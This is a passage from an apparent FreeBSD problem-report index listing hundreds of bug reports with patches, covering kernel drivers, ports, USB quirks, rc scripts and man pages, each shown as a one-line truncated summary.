man5/nsmb.conf.5 o bin/132302 [patch] smbutil(1): contrib/smbfs subr.c: saved passwo o ports/132294 stas [PATCH] lang/ruby18: Add option to build with Profile- o ports/132293 stas [PATCH] lang/ruby19: Add option to build with Profile- o ports/132274 portmgr [patch] Mk/bsd.port.mk: Revert USE_RC_SUBR changes mad o kern/132273 geom glabel(8): [patch] failing on journaled partition o kern/132271 [puc] [patch] puc support for a generic card f ports/132231 gecko [PATCH] www/firefox3: Add option to build with Profile o ports/132213 anders [patch] mail/imap-uw: Add support for ~/mail as defaul o docs/132193 doc [patch] description in the malo(4) manpage incorrect o conf/132179 net [patch] /etc/network.subr: ipv6 rtsol on incorrect wla p conf/132135 [PATCH] etc/crontab: HOME setting overrides o bin/132114 randi [patch] add new 'docs' virtual category to sysinstall o bin/132112 [patch] devd(8) unnecessarily reconfigures carp(4) int o kern/132104 [kernel] [patch] kenv(1) buffer overflow o usb/132080 usb [patch] [usb] Kernel panic after NOMEM caused by rum c o ports/132074 tdb [patch] - update security/f-prot to version 6.0.1 o conf/132008 [PATCH] to allow using section/nosection in KERNCONF o kern/132001 [patch] [ixgb] driver update o kern/131933 [uart] [patch] Cannot detect Sony Ericsson GC89 EDGE/W o ports/131930 x11 [PATCH] x11-servers/xorg-server coredumps on exit o docs/131918 doc [patch] Fixes for the BPF(4) man page o usb/131912 usb [uslcom] [patch] New devices using Silicon Labs chips o usb/131900 usb [usbdevs] [patch] Additional product identification co o docs/131684 doc [patch] articles/linux-comparison: replace Addenda by o docs/131626 pgj [patch] dump(8) "recommended" cache option confusing o docs/131625 pgj [patch] Typos in ed(1) man page o docs/131590 doc [patch] whitespace-only change of developers-handbook/ o bin/131567 net [socket] [patch] Update for regression/sockets/unix_cm o docs/131562 doc [patch] groff(1): don't corrupt man pages by replacing s ports/131537 jpaetzel [PATCH] devel/py-yaml: update to 3.08 o kern/131536 net [netinet] [patch] kernel does allow manipulation of su o ports/131452 portmgr [PATCH] Fix the problem usage MASTER_SITE_SUBDIR witho s ports/131447 jpaetzel [PATCH] multimedia/transcode: update to 1.1.0 o bin/131427 [patch] Add to fetch(1) an ability to limit a number o p bin/131250 bz [patch] ppp(8) proxyarp does not work o bin/131143 [patch] amd(8) causes annoying "embedded slash in map f usb/131123 usb [patch] re-add UQ_ASSUME_CM_OVER_DATA USB quirk o kern/131086 fs [ext2fs] [patch] mkfs.ext2 creates rotten partition o misc/131059 [tinybsd] [patch] tinybsd MFSROOT option suggests YES/ o bin/130874 [patch] fix typo in nvi(1) (subsitution -> substitutio o misc/130856 [build] [patch] make installworld work when WITHOUT_GA o bin/130855 [PATCH] add a chown(8)/chgrp(8) -x option to avoid cro o ports/130811 doceng [PATCH] Floating point exceptions Ghostscript 8.63 (pr p ports/130779 [PATCH] emulators/dosbox enable directserial passthrou o kern/130749 [libc] [patch] nscache.c/nscachedcli.c - return error o docs/130742 doc [patch] articles/geom-class: russian translation is mi o kern/130735 scsi [cam] [patch] pass M_NOWAIT to the malloc() call insid o kern/130724 emulation [linprocfs] [patch] cpuinfo in linprocfs is dated, cau o kern/130657 bz [ip6] [patch] ipv6 class option o conf/130555 net [rc.d] [patch] No good way to set ipfilter variables a p docs/130548 geom [patch] gjournal(8) man page is missing sysctls o kern/130512 [ipmi] [patch] Various mistakes in IPMI watchdog handl o kern/130476 [build] [patch] Error in compiling kernel with device o conf/130414 rc [patch] rc services started with onestart are not stop o docs/130394 jb [patch] Minor typo in dtrace(1M) man page o ports/130387 portmgr [PATCH] Mk/bsd.port.mk - Add macros for COPYTREE_WWW a a kern/130386 rwatson [patch] add locking for generic interface address mani o bin/130366 randi [patch] sysinstall(8): Minor correction to sysinstall o usb/130325 usb [usb] [patch] fix tools/tools/usb/print-usb-if-vids.sh o kern/130286 [patch] hifn(4) changes s ports/130199 chinsan [PATCH] audio/mp3info: take maintainership s ports/130198 chinsan [PATCH] audio/libshout2: take maintainership o ports/130183 hoek [PATCH] converters/xdeview switch to USE_TCL p bin/130159 bz [patch] ppp(8) fails to correctly set routes o ports/130146 multimedia [PATCH] multimedia/transcode: update to 1.0.7 o bin/130132 ipfw [patch] ipfw(8): no way to get mask from ipfw pipe sho a kern/130107 dfr [devctl] [patch] in devctl_queue_data(): possible use o bin/130056 [patch] have nfsstat(1) use strtonum instead of atoi f ports/129972 glarkin Update Port: benchmarks/lmbench [patch] - A system per o bin/129965 [patch] ps(1): ps -lH doesn't show the proper CPU# o usb/129945 usb [usbdevs] [patch] add u3g support for Longcheer WM66 U o kern/129861 pf [pf] [patch] Argument names reversed in pf_table.c:_co p usb/129858 remko [usb] [patch] Need to add quirk to da_scsi.c to suppor o bin/129855 [patch] ipcs(1) integer overflow with UIDs bigger than o bin/129814 [patch] support of per script nice(1) value in periodi o ports/129813 delphij [PATCH] net/openldap24-server: RC script assumes too m p kern/129793 bz [ip6] [patch] Locking related leaks in the kernel (rou o ports/129790 lioux [PATCH] net-p2p/mldonkey: Fix rc start script o kern/129784 [ata] [patch] SATA port multiplier disk detect bugs in o ports/129782 tmclaugh [PATCH] security/sudo: update to 1.7.0 o bin/129764 [patch] unbreak sbin/newfs build for the 8-CURRENT o usb/129758 usb [uftdi] [patch] add Pyramid LCD usb support o ports/129741 portmgr [patch] bsd.port.mk: support systems that have been bu o conf/129697 [patch] fix misbehavior of periodic/daily/100.clean-di o ports/129687 obrien [patch] unbreak net/tcpshow for gcc-4.2.1 p bin/129630 [patch] bsnmpd(1): teach hostres module about ZFS o bin/129620 [patch] Incorrect bzip2(1) behavior o ports/129577 des [PATCH] sysutils/munin-main: does not honor BATCH/PACK o ports/129576 des [PATCH] sysutils/munin-node: does not honor BATCH/PACK p stand/129554 standards lp(1) [patch] Implement -m and -t options o ports/129553 hrs [patch] print/acroread8 can't launch some programs due o usb/129522 usb [ubsa] [patch] add support for ZTE AC8700 modem o ports/129422 ume [patch] mail/cyrus-imapd23: add patch for autocreate I o bin/129405 [patch] tcsh(1) vfork bugs p docs/129398 trhodes [patch] ddb(8): various tweaks to ddb-related man page o kern/129352 net [xl] [patch] xl0 watchdog timeout o usb/129251 usb [usbdevs] [patch] Liebert UPS being assigned uhid and o kern/129231 fs [ufs] [patch] New UFS mount (norandom) option - mostly o ports/129210 portmgr [patch] Instrument bsd.port.mk to detect unstripped bi o usb/129173 usb [uplcom] [patch] Add support for Corega CG-USBRS232R a o bin/129170 keramida [patch] fix truss(1) segv for unknown syscall o kern/129169 emulation [linux] [patch] Linux Emulation ENOTCONN error using n o kern/129059 fs [zfs] [patch] ZFS bootloader whitelistable via WITHOUT o docs/129024 keramida [patch] ipfw(8) improvements p arm/128987 stas [patch] Fix at91_mci and use 1-bit mode. o usb/128977 usb [usb] [patch] uaudio is not full duplex o ports/128838 des [PATCH] www/varnish 2.0.1 enhancements o usb/128803 usb [usbdevs] [patch] Quirk for I-Tuner Networks USBLCD4X2 o ports/128782 ume [PATCH] mail/cyrus-imapd23 2.3.13 p usb/128760 cperciva [ums] [patch] patch for Microsoft Comfort Optical Mous o bin/128725 [patch] whois(1) does not correctly send queries regar o docs/128711 blackend Re: [patch] for handbook browsers page o gnu/128645 [patch] grep(1): teach grep -r to how to ignore direct f kern/128639 acpi [patch] [acpi_asus] acpi for ASUS A6F,A3E,A3F,A3N not f kern/128634 acpi [patch] fix acpi_asus(4) in asus a6f laptop p bin/128616 kientzle [patch] bsdtar(1) error message typo p misc/128610 kensmith [patch] /usr/src: the iso.1 target of make release do o kern/128608 [pccbb] [patch] add support for powering down and up C o bin/128605 secteam [patch] dhclient(8) - security issue o ports/128603 [patch] textproc/flex has too small capacity o bin/128587 kensmith [patch] sysinstall(8) uses first mirror in Turkey even o bin/128582 [patch] wpa_cli(8): activate readline(3) support o kern/128577 [ixgbe] [patch] Send queue stall in ixgbe driver when o bin/128561 kientzle [patch] compile warning fixes for bsdtar test harness o bin/128493 [patch] find(1) exits if -fstype test fails with EACCE o usb/128485 usb [umodem] [patch] Nokia N80 modem support o ports/128467 ale [patch] databases/php4-dba: change Berkeley DB detecti o misc/128444 [build] [patch] create USB stick install image o conf/128433 [patch] Add option to allow a full login when doing 's o bin/128427 [patch] mdfs(8): mount_mfs warns "chmod: Read-only fil o bin/128398 geom [patch] glabel(8): teach geom_label to recognise gpt l o kern/128335 [patch] [cpufreq] Missing call to sbuf_delete() in two o usb/128324 usb [uplcom] [patch] remove baud rate restriction for PL23 o conf/128299 rc [patch] /etc/rc.d/geli does not mount partitions using o bin/128295 net [patch] ifconfig(8) does not print TOE4 or TOE6 capabi o bin/128277 [patch] improvements for fwcontrol(8) utility o gnu/128262 [libgcc] [patch] contrib/gcclibs/libcpp/errors.c: -Wmi o kern/128260 ipfw [ipfw] [patch] ipfw_divert damages IPv6 packets p docs/128222 trhodes [patch] man page truss(1) claims that init(8) can be t o kern/128165 [aac] [patch] sync aac(4) with the latest vendor versi o kern/128103 vwe [feature request] [patch] new SiS 190 NIC driver o bin/128096 bushman [patch] nscd(1): Failure in memset . o bin/128094 [patch] lint(1): Sizeof(pointer) bug in usr.bin/xlint/ p docs/128089 kientzle [patch] Incorrect type in archive_write(3) manpage o kern/128040 [pccbb] [patch] System hangs when PCMCIA-CF adapter pl o kern/128037 [pccbb] [patch] System hang on shutdown with PCMCIA-CF o kern/128036 [sio] [patch] serial console mostly ignores typein to o ports/128025 shaun [patch] security/heimdal ldap support broken under 7 o i386/128014 i386 [geode] [patch] AMD Geode CS5536 watchdog(9) not disab p bin/127986 [patch] ee(1): fix compiler warnings caused by use of o usb/127980 usb [umass] [patch] Fix Samsung YP U2 MP3 player on 7.x an o bin/127932 [patch] mkdir(1): mkdir -p PATH fails if a directory i o kern/127928 net [tcp] [patch] TCP bandwidth gets squeezed every time t o bin/127918 [patch] ATA Security support for atacontrol(8) o conf/127917 rc [patch] dumpon rejects on start with physmem>swap even o docs/127908 doc [patch] readdir(3) error documentation o www/127898 bugmeister [patch] query-pr.cgi: properly treat quoted-printable o bin/127872 [libc] [patch] Rewinding on unionfs and Subversion p docs/127840 murray [patch] fix entity references in release/doc/en_US.ISO o kern/127834 net [ixgbe] [patch] wrong error counting s ports/127822 tmclaugh [PATCH] security/sudo: add tuneable variable SUDO_LDAP o kern/127815 net [gif] [patch] if_gif does not set vlan attributes from o bin/127764 [boot0cfg] [patch] preserve NT disk UID data for boot0 p misc/127759 edwin [nanobsd] [patch] nanobsd.sh incorrectly calculates pa o ports/127718 brooks [patch] devel/llvm: use PIC on amd64 and add optional o kern/127717 [ata] [patch] - support write cache toggling per devic o ports/127636 mnag [PATCH] www/lighttpd: lighttpd dir_favicon o bin/127633 edwin [patch] Update top(1) to 3.8b1 s ports/127608 marius [patch] sysutils/cdrtools - cdrecord: fix device enume p docs/127602 trhodes [patch] Incomplete information in nsswitch.conf(5) o kern/127581 acpi [patch] [acpi_sony] Add support for more Sony features o misc/127550 [tools] [patch] src/tools/tools/editing/freebsd.vim im s usb/127549 usb [umass] [patch] Meizu MiniPlayer M6 (SL) requires some o usb/127543 n_hibma [patch] [ubsa] Support Option Globetrotter HSDPA modem o bin/127532 [patch] install(1): install -S Not Safe in Jail with s f ports/127499 mi [PATCH] Update devel/icu to 4.0 o bin/127475 [patch] sockstat(1) output columns run into each other o misc/127471 [build] [patch] installworld fails if install-info is p kern/127446 emax [kbdmux] [patch] fix race in sys/dev/kbdmux/kbdmux.c o ports/127435 mnag [patch] www/lighttpd mod_deflate patch for freebsd p docs/127432 remko [patch] update fsck_ffs(8) man-page with regarding to p docs/127406 n_hibma [patch] update umodem man page: Sony Ericsson W810i o kern/127391 [ata] [patch] Intel 6300ESB SATA150 cannot find disk a o i386/127387 kib [i386] [patch] Inline assembler in x86 _start() in crt p i386/127367 delphij [vesa] [patch] Improve VESA support for Parallels (pat a bin/127331 edwin [patch] top(1) only shows cputime used by one process o ports/127319 dougb [PATCH] ports-mgmt/portmaster - add completion for zsh o ports/127303 kuriyama [patch] misc/amanda-server Add pkg-install to create m p kern/127289 [ata] [patch] new pci ids for SiI3132 present on adapt o bin/127280 des [libfetch] [patch] fetch/libfetch RFC 1738 %2F escaped o bin/127265 [patch] ddb(4): Adding the ddb command set from module o kern/127230 ipfw [ipfw] [patch] Feature request to add UID and/or GID l s ports/127229 lwhsu [PATCH] sysutils/dtc: unbreak, fix some typos, remove o ports/127214 secteam [PATCH] ports-mgmt/portaudit: Please change to U o kern/127121 pf [pf] [patch] pf incorrect log priority o kern/127042 pf [pf] [patch] pf recursion panic if interface group is p kern/127040 davidxu [patch] mqueuefs(5) witness panic o bin/127034 [patch] Add option to count apparent size to du(1) f kern/126984 glebius [carp] [patch] add carp userland notifications via dev o conf/126946 [patch] Add OpenVPN ports to services(5) o kern/126926 [build] [patch] Add MACHINE to dmesg o kern/126924 net [an] [patch] printf -> device_printf and simplify prob o kern/126895 net [patch] [ral] Add antenna selection (marked as TBD) o usb/126884 usb [ugen] [patch] Bug in buffer handling in ugen.c p conf/126841 philip [syscons] [patch] Add eee900 keyboard layout to /usr/s o kern/126688 net [ixgbe] [patch] 1.4.7 ixgbe driver panic with 4GB and p bin/126682 delphij [patch] sed(1) segfaults on error rather than error me o ports/126668 multimedia [patch] multimedia/ffmpeg - quick and dirty symbol bui p bin/126657 [patch] w(1) breaks multibyte date format o docs/126590 doc [patch] Write routine called forever in Sample Echo Ps p misc/126435 ed [patch] /usr/share/examples/drivers/make_pseudo_driver o bin/126433 [patch] some missing checks in rm(1) o conf/126392 rc [patch] rc.conf ifconfig_xx keywords cannot be escaped o bin/126324 rc [patch] rc.d/tmp: Prevent mounting /tmp in second tim o kern/126300 [build] [patch] Add missing -mno-sse3 flag for AMD64 t p docs/126227 trhodes [patch] kthread(9) refers to non-existent manpage, des f ports/126079 portmgr [patch] bsd.port.mk: make openssl.mk usable after pre. o kern/126075 net [inet] [patch] internet control accesses beyond end of o ports/126019 multimedia [patch] multimedia/transcode patch revision f ports/125996 danfe [patch] x11/nvidia-driver - remove pkg_info statements o bin/125922 net [patch] Deadlock in arp(8) p bin/125878 kmacy [patch] [request] Add zfs/zpool to rescue programs. o kern/125859 [ata] [patch] sata access failure [regression] o kern/125845 net [netinet] [patch] tcp_lro_rx() should make use of hard o ports/125823 sem [PATCH] ports-mgmt/portupgrade does not use custom ECH o kern/125808 rnoland [drm] [patch] Radeon X800 GTO - *ERROR* Offset failed s kern/125756 multimedia [sound] [patch] cannot detect soft-modem on HDA bus o bin/125707 [patch] powerd(8): force a method of battery state que o bin/125678 [patch] ls(1) -h option doesn't work if the listing co o kern/125675 [keyboard] [patch] Add hw.syscons.kbd_suspend new sysc p docs/125639 trhodes [patch] kldunloadf(2) does not mention about possible a kern/125613 rwatson [ufs] [patch] ACL problems with special files o conf/125551 [patch] building WLAN userland should be optional o kern/125496 [ar] [patch] free memory on ataraid module unload o kern/125454 [digi] [patch] device digi (PC/Xe 64K 16 ports) not wo o bin/125449 [patch] awk(1): /usr/bin/awk fails mawk's FPE test o bin/125370 ipfw [ipfw] [patch] increase a line buffer limit o bin/125365 matteo [patch] mdconfig(8) -l overflow for size field o bin/125350 des [libfetch] [patch] src/lib/libfetch add support for de o usb/125264 usb [patch] sysctl for set usb mouse rate (very useful for p docs/125253 trhodes [patch] jail(2) does not mention about possible error p kern/125181 thompsa [ndis] [patch] with wep enters kdb.enter.unknown, pani p bin/125154 matteo [patch] mount(8) ignores values returned by exec_mount a kern/125139 philip [patch] [ata] bugs in ATAPI CD tray control p bin/125098 [patch] ee(1) consume 100% cpu usage o ports/125045 ume [patch] mail/cyrus-imapd: add patch for autocreate INB o conf/125041 [patch] New file: /etc/periodic/security/810.loginok o kern/125034 [devfs] [patch] devfs does not apply rules to newly cr o kern/125030 [devfs] [patch] Command 'devfs ruleset 0' causes panic o kern/125009 [patch] access(2) grants root execute perms for non-ex o kern/124996 [patch] "filesystem goof: vop_panic[vop_revoke]" panic o kern/124973 geom [gjournal] [patch] boot order affects geom_journal con o kern/124963 alc [vm] [patch] old pagezero fixes for alc o i386/124902 i386 [i386] [patch] patch to fix VESA modes and allow 8bit o kern/124881 [devfs] [patch] [request] Add possibility to check whi p kern/124853 gonzo [devfs.rules] [patch] devfs_ruleset_use may use freed o bin/124822 [editline] [patch] Editline's ed-search-{prev,next}-hi o ports/124798 brix [patch] irc/bitlbee is not doing SRV lookups for XMPP o bin/124748 [patch] sh(1): sh -c 'exit -1' fails with "Illegal num o conf/124747 rc [patch] savecore can't create dump from encrypted swap o kern/124744 acpi [acpi] [patch] incorrect _BST result validation for To a docs/124716 trhodes [patch] GEOM RAID1 handbook example only covers boot p o ports/124707 danfe [patch] audio/libgpod - add python support again o conf/124641 [patch] new periodic script for checking for ports wit f kern/124621 fs [ext3] [patch] Cannot mount ext2fs partition o kern/124564 [kernel] [patch] add CPUID bits to ident phenom proces o bin/124517 [patch] cdcontrol(1) doesn't print all error messages o kern/124487 [procfs] [patch] Extending the PROCFS (/proc) filesyst o misc/124431 [build] [patch] minor revision of BDECFLAGS o bin/124392 rink [patch] bootparamd(8) does not work on arm p misc/124385 mtm [build] [patch] usr.sbin/ngctl/main.c fails to compile o bin/124349 [patch]: stat(1) should interpret st_flags as it does p bin/124342 mtm ggated(8): [patch] sbin/ggate/ggated/ggated.c fails to p kern/124334 mtm [libc] [patch] lib/libc/glob.c fails to compile under p bin/124251 mtm [patch] add BUGS section to rcorder.8 with REQUIRE exp o conf/124248 rc [jail] [patch] add support for nice value for rc.d/jai o kern/124225 cokane [ndis] [patch] ndis network driver sometimes loses net o kern/124202 [aic] [patch] Add Adaptec 39320LPE to list of known de o kern/124164 [patch] Add SHA-256/512 hash algorithm to crypt(3) o kern/124064 [ar] [patch] cannot handle >16 serial number with Inte o bin/124052 [patch] adduser(8) throws errors when -f input file in o kern/123980 [ata] [patch] Implement ATA UDMA speed limit (hw.ata.a p kern/123961 net [vr] [patch] Allow vr interface to handle vlans o gnu/123921 [patch] cpio(1): cpio -oc bug with write_out_header() o kern/123892 net [tap] [patch] No buffer space available o kern/123858 net [stf] [patch] stf not usable behind a NAT p bin/123807 imp [patch] timed(8) does not run on arm (incorrect getopt o kern/123793 bz [ipsec] [patch] KAME IPSEC does not pass processed pac o bin/123774 [patch] kdump(1): time_t printing issues o conf/123734 rc [patch] Chipset VIA CX700 requires extra initializatio o bin/123703 [patch] timed(8): qualify bad diagnostic in src/usr.sb o bin/123693 [patch] burncd(8): workaround for busy cd-writer while o bin/123644 [patch] [sysctl] Allow sysctl(8) to ignore unknown OID o kern/123630 geom [patch] [gmirror] gmirror doesnt allow the original dr o bin/123553 [patch] Prevent indent(1) from splitting unrecognized o conf/123551 [patch] [periodic] /etc/periodic/daily/440.status-mail p kern/123518 [patch] src/sys/kern.mk fails to disable -msse3 for am o docs/123484 edwin [patch] teach pxeboot.8 about ISC DHCP v3 o bin/123418 [patch] du(1): add -g (Gbyte) option to du(1) + manpag o usb/123352 usb [usbdevs] [patch] Add Option GTMAX3.6/7.2 and Quallcom o usb/123351 usb [usbdevs] [patch] Add Reiner SCT cyberJack, Omnikey [2 p bin/123329 phk [patch] usage strings for fifolog_create(1) and fifolo o misc/123240 [nanobsd] [patch] rerunning nanobsd.inc.sh fails becau o bin/123237 randi sysinstall(8): [patch]: sysinstall(8) -- remove dummy o conf/123222 rc [patch] Add rtprio(1)/idprio(1) support to rc.subr(8). o ports/123185 portmgr [patch] Mk/bsd.port.mk - Add extended description to O o kern/123177 secteam [random] [patch] arc4rand(9) produces the same sequenc o misc/123156 [build] [patch] make.conf update to "make update" sect o misc/123155 [build] [patch] src/Makefile.inc1 bug: remove obsolete p kern/123147 remko [ti] [patch] ti(4) doesn't use mii, but kernel configs o conf/123119 ipfw [patch] rc script for ipfw does not handle IPv6 p bin/123069 [patch] ps(1): invalid value of 'elapsed' field in ps o ports/123042 portmgr [patch] bsd.port.mk - Fix USE_LDCONFIG when used with f docs/123038 trhodes [patch] update to projects/c99/index.sgml p docs/123035 trhodes [patch] bugs in refuse.README a bin/123021 [patch] mount(8): mount -p shows incorrect mount optio o bin/123015 brooks [patch] rc.conf(8): implement automated creation of /e o usb/122992 usb [umass] [patch] MotoROKR Z6 Phone not recognised by um o ports/122974 dougb [PATCH] dns/bind94: add DLZ config options o usb/122956 usb [ubsa] [patch] add support for Novatel Wireless XU870 f ports/122922 multimedia [patch] multimedia/ffmpeg text output is mangled o usb/122905 usb [ubsa] [patch] add Huawei E220 to ubsa o conf/122883 [patch] login class for ukrainian users accounts o ports/122877 portmgr [patch] Mk/bsd.port.mk - Show all pkg-message files o usb/122819 usb [usb] [patch] Patch to provide dynamic additions to th p conf/122811 brian [periodic] [patch] the daily_clean_disks scripts walks o kern/122670 [ata] [patch] broken acd_get_progress = ioctl CDRIOCGE p bin/122659 stefanf [patch] sh(1) long arithmetics broken on certain archi o bin/122652 [patch] du(1) support for inode count o i386/122623 i386 [build] [patch] bsd.cpu.mk doesn't handle opteron/athl o usb/122621 usb [new driver] [patch] New driver for Sierra Wireless 3G o bin/122519 [patch] ppp(8): ppp provides deficient DNS info o conf/122477 rc [patch] /etc/rc.d/mdconfig and mdconfig2 are ignoring f misc/122300 kensmith [build] [patch] SEPARATE_LIVEFS arch dependent set but o kern/122288 [md] [patch] mdconfig(8) returning negative unit numbe o bin/122271 [patch] usr.bin/xinstall - Add support for -D option ( o conf/122170 rc [patch] [request] New feature: notify admin via page o p bin/122137 matteo [patch] Have crontab(1) use snprintf instead of sprint p bin/122070 matteo [patch] crontab(1): Zero out pw_passwd in crontab o kern/122047 fs [ext2fs] [patch] incorrect handling of UF_IMMUTABLE / o bin/122043 [patch] du(1) does not support byte-count-based report o conf/122037 [patch] add rsync example for inetd.conf o usb/122025 usb [uscanner] [patch] uscanner does not attach to Epson R o stand/121921 standards [patch] Add leap second support to at(1), atrun(8) o kern/121917 [boot] [patch] Broken boot on Asus P4P800-VM after upg s ports/121902 gabor [PATCH] textproc/ispell add OPTIONS o kern/121899 [ar] [patch] Drive detached from Intel Matrix RAID and o kern/121897 [patch] realpath(3) segmentation fault o bin/121895 net [patch] rtsol(8)/rtsold(8) doesn't handle managed netw p conf/121783 cperciva [patch] freebsd-update(8) upgrade overwrites device.hi o usb/121755 usb [ohci] [patch] Fix panic after ohci/uhub cardbus devic o kern/121706 net [netinet] [patch] "rtfree: 0xc4383870 has 1 refs" emit o ports/121688 kde [patch] editors/koffice-kde3: several depencancy fixes o ports/121672 wes [Patch] mail/mimedefang: opt out of clamav use o bin/121671 bushman [patch] nscd(8) prints needless banner f kern/121660 jkoshy [hwpmc] [patch] hwpmc(4) incorrectly handles PMC sampl o kern/121656 [libc] [patch] telldir(3) issues o stand/121568 standards [patch] ln(1): wrong "ln -s" behaviour o kern/121566 rc [nfs] [request] [patch] ethernet iface should be broug o kern/121559 geom [patch] [geom] geom label class allows to create inacc o bin/121542 krion [patch] teach pkg_add(1) to accept PACKAGEROOT and PAC o kern/121521 [ata] [patch] add VIA CX700M2 chipset to ata driver p bin/121512 mtm [sysctl] [patch] sysctl(8) should return 1 if the user o kern/121504 acpi [patch] Correctly set hw.acpi.osname on certain machin o bin/121502 [patch] option -P appears to be broken in restore(8) s p docs/121490 brueffer [patch] Multiple typos ("in in") in /usr/src files o usb/121474 usb [cam] [patch] QUIRK: SAMSUNG HM250JI in LaCie usb hard o usb/121426 usb [patch] [uscanner] add HP ScanJet 3570C o bin/121424 doc [patch] [ipfw] Rectify ambiguous English in manual o ports/121413 portmgr [patch] bsd.port.mk: introduce USE_LZMA for lzma-compr o bin/121366 fs [zfs] [patch] Automatic disk scrubbing from periodic(8 o bin/121359 net [patch] ppp(8): fix local stack overflow in ppp o bin/121243 des [patch] passwd(1) patch for usage with PAM/LDAP o arm/121242 ticso [ate] [patch] Promiscuous mode of if_ate (arm) doesn't p usb/121184 usb [uipaq] [patch] add ids from linux ipaq driver (plus a p bin/121182 [patch] newfs_msdos(8) should supports devices without o docs/121173 doc [patch] mq_getattr(2): mq_flags mistakenly described a p kern/121156 multimedia [sound] [patch] Turn on inverted external amplifier se o ports/121143 markus [PATCH] audio/cdparanoia: rip multisession CDs correct o kern/121122 ipfw [ipfw] [patch] add support to ToS IP PRECEDENCE fields o kern/121102 acpi [acpi_fujitsu] [patch] update acpi_fujitsu for the P80 o kern/121074 des [patch] Add RFC2617 digest authentication to fetch(3) o kern/121073 [kernel] [patch] run chroot as an unprivileged user o conf/121064 [patch] Use ASCII characters for box/line characters i o usb/121045 usb [uftdi] [patch] Add support for PC-OP-RS1 and KURO-RS o bin/120994 [patch] alignment violation in chap module of ppp(8) c o conf/120993 [patch] 340.noid -- Add "find -x" capability (don't cr o bin/120990 [patch] support "BIOS Boot" partition type in gpt(8) o kern/120989 scottl [udf] [patch] UDF (with DVD RAM) isn't mountable/reada p docs/120945 net [patch] ip6(4) man page lacks documentation for TCLASS p bin/120891 dwmalone [patch] enhancement to syslogd(8) - always printing lo o kern/120884 [bktr] [patch] bktr driver always stores the contigmal o kern/120872 [libkvm] [patch] fstat exit on signal 11 o bin/120870 [patch] truss(1) shows 'pipe' system call as having 6 o kern/120858 scottl [patch] [cam] panic: ufs_dirbad with CLARiiON CX3-40 o bin/120813 [patch] grdc(6) off by 500 ms (on average) o ports/120756 des [PATCH] sysutils/munin-node: Use fixed GID o ports/120755 des [PATCH] sysutils/munin-main: Use fixed UID/GID p kern/120714 gonzo [viapm] [patch] viapm driver doesn't work on VIA VT823 o usb/120572 usb [umass] [patch] quirk to support ASUS P535 as umass (a o ports/120532 portmgr [PATCH] bsd.port.mk - add more recursive-foo targets o kern/120515 acpi [acpi] [patch] acpi_alloc_wakeup_handler: can't alloc o kern/120483 fs [ntfs] [patch] NTFS filesystem locking changes o kern/120482 fs [ntfs] [patch] Sync style changes between NetBSD and F o conf/120431 rc [patch] devfs.rules are not initialized under certain o conf/120406 rc [devd] [patch] Handle newly attached pcm devices (eg. o kern/120304 net [netgraph] [patch] netgraph source assumes 32-bit time o kern/120270 simon [crypto] [patch] AES-192 and AES-256 support for HW-ac o conf/120263 [patch] 800.loginfail misses relevant security informa o bin/120256 [patch] ftp(1): ftp -u URL/ returns a -1 o kern/120232 net [nfe] [patch] Bring in nfe(4) to RELENG_6 o conf/120228 rc [zfs] [patch] Split ZFS volume startup / ease ZFS swap o amd64/120202 amd64 [amd64] [patch] [panic] kernel panic at start_all_aps, o conf/120194 rc [patch] UFS volumes on ZVOLs cannot be fsck'd at boot p kern/120138 jeff [sched_ule] [patch] steal_thresh may be set a wrong va o kern/120128 attilio [libc] [patch] __getcwd erroneously returning ENOENT o docs/120125 doc [patch] Installing FreeBSD 7.0 via serial console and o bin/120114 [patch] reboot(8) - add features available in Solaris. o kern/120073 [new driver] [patch] add support for Meinberg PCI-base o kern/120057 pf [pf] [patch] Allow proper settings of ALTQ_HFSC. The c o ports/119997 dougb [PATCH] dns/bind94: added GeoIP patches o usb/119981 usb [axe] [patch] add support for LOGITEC LAN-GTJ/U2 gigab o ports/119923 demon [patch] sysutils/ascpu does not work FreeBSD 8.0-CURRE p threa/119920 deischen [patch] fork broken in libpthread o conf/119874 rc [patch] "/etc/rc.d/pf reload" fails if there are macro o kern/119767 jfv [em] [patch] if_em fix for systems without msix suppor o ports/119710 sumikawa [patch] net/netcat - nc command runs BSD nc instead of o kern/119668 scsi [cam] [patch] certain errors are too verbose comparing o usb/119653 usb [cam] [patch] iriver s7 player sync cache error patch o bin/119610 [patch] config(8): config -x appends unwanted trailing o kern/119606 [sio] [patch] PCMCIA card not attached to driver o amd64/119591 amd64 [amd64] [patch] time_t on 64-bit architecture o kern/119575 simokawa [firewire] [patch] sbp_targ cannot handle multiple CTI o bin/119483 [patch] vidcontrol(1) misses latest VESA mode (off-by- o conf/119464 [patch] [request] Add 'sorted' option to etc/periodic/ o kern/119358 [kernel] [patch] SYSINIT_VERBOSE can be more verbose p docs/119329 trhodes [patch] Fix misleading man 1 split o kern/119307 emaste [queue] [patch] TRASHIT macro blasts list header if RE o kern/119298 kan [xfs] [patch] 7-Stable/sys/modules/xfs fails to make f o usb/119227 usb [ubsa] [patch] ubsa buffer is too small; should be tun o kern/119205 [dc] [patch] Collect various stats regarding dc(4) int o kern/119202 [kernel] [patch] Add generic support for disabling dev o usb/119201 usb [cam] [patch] Quirks for Olympus FE-210 camera, LG and o i386/119175 i386 [busdma] [patch] Typo in bus_dmamem_alloc() o usb/119150 remko [usbdevs] [patch] new usbdevs for CDMA 1xEVDO devices o bin/119077 [patch] sysinstall(8) - reading packages from index is o conf/119076 rc [patch] [rc.d] /etc/rc.d/netif tries to remove alias a o bin/119014 [patch] IPv6 addresses cause sockstat(1) to run column o docs/118902 doc [patch] wrong signatures in d2i_RSAPublicKey man pages a kern/118879 net [bge] [patch] bge has checksum problems on the 5703 ch o bin/118874 [patch] tftpd(8): add TFTP Option Extension (rfc 2347) p conf/118770 mtm [patch] rc.d scripts: print information instead of sil o kern/118739 [cpufreq] [patch] Allow the cpufreq/p4tcc driver to de o kern/118727 net [netgraph] [patch] [request] add new ng_pf module o bin/118723 gcooper [patch] od(1)/hexdump(1) truncates last partial repeat o kern/118713 fs [minidump] [patch] Display media size required for a k o bin/118636 sysinstall(8): [patch] [request] remove requirement fo o threa/118544 delphij [libc] [patch] the "clnt_create" function in "libc/rpc p kern/118540 kaiw [elf] [patch] update sys/sys/elf_common.h with new ema o kern/118493 weongyo [ndis] [patch] a trivial fix when ndis sets `ndis_reso o usb/118485 usb [usbdevs] [patch] Logitech Headset Workaround o kern/118447 [ata] [patch] Troublesome DMA modes with VIA Apollo VP p kern/118439 thompsa [ndis] [patch] if_ndis - fix a panic when ndis_attach( p usb/118374 attilio [ubsa] [patch] support Option GlobeTrotter Max 3.6 wir p kern/118370 